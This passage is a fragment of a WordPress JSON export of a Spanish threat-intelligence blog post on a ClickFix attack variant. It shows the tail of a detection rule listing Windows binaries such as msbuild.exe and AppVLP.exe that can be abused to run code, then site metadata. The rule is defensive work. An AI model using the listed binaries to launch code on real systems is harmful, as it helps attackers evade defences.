\u2013 &#8216;mftrace.exe &#8216;<\/li>\n<li>  \u2013 &#8216;AppVLP.exe &#8216;<\/li>\n<li>  \u2013 &#8216;svchost.exe&#8217;<\/li>\n<li>  \u2013 &#8216;msbuild.exe&#8217;<\/li>\n<li>  condici\u00f3n: clave_selecci\u00f3n y proceso_selecci\u00f3n y datos_selecci\u00f3n<\/li>\n<li>falsos positivos:<\/li>\n<li>  \u2013 \u00abActividad administrativa leg\u00edtima utilizando el cuadro de di\u00e1logo Ejecutar (Win+R) para ejecutar herramientas integradas\u00bb.<\/li>\n<li>  \u2013 \u00abScripts de TI o pasos de soluci\u00f3n de problemas ejecutados de forma interactiva por un usuario\u00bb.<\/li>\n<li>nivel: medio<\/li>\n<\/ul>\n<p>Lea m\u00e1s blogs sobre inteligencia de amenazas e investigaci\u00f3n de adversarios: <a href=\"https:\/\/atos.net\/en\/lp\/cybershield\" rel=\"noopener\" target=\"_blank\">https:\/\/atos.net\/es\/lp\/cybershield<\/a><\/p>\n<div class=\"cf note-b\">\u00bfEncontr\u00f3 interesante este art\u00edculo? <span class=\"\">Este art\u00edculo es una contribuci\u00f3n de uno de nuestros valiosos socios.<\/span> S\u00edguenos en <a href=\"https:\/\/news.google.com\/publications\/CAAqLQgKIidDQklTRndnTWFoTUtFWFJvWldoaFkydGxjbTVsZDNNdVkyOXRLQUFQAQ\" rel=\"noopener\" target=\"_blank\">noticias de google<\/a>, <a href=\"https:\/\/twitter.com\/thehackersnews\" rel=\"noopener\" target=\"_blank\">Gorjeo<\/a> y <a href=\"https:\/\/www.linkedin.com\/company\/thehackernews\/\" rel=\"noopener\" target=\"_blank\">LinkedIn<\/a> para leer m\u00e1s contenido exclusivo que publicamos.<\/div>\n<\/div>\n<p><script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Descargo de responsabilidad: Este informe ha sido elaborado por el Centro de Investigaci\u00f3n de Amenazas para mejorar la concienciaci\u00f3n sobre la ciberseguridad y apoyar el fortalecimiento de las capacidades de defensa. Se basa en investigaciones y observaciones independientes del panorama de amenazas actual disponibles en el momento de la publicaci\u00f3n. El contenido est\u00e1 destinado \u00fanicamente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,5],"tags":[528,24,872,312,132,873],"class_list":["post-248","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-trending","tag-clickfix","tag-cyberdefensa-mx","tag-investigando","tag-nueva","tag-una","tag-variante"],"_links":{"self":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":0,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media\/249"}],"wp:attachment":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media?parent=248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/categories?post=248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/tags?post=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}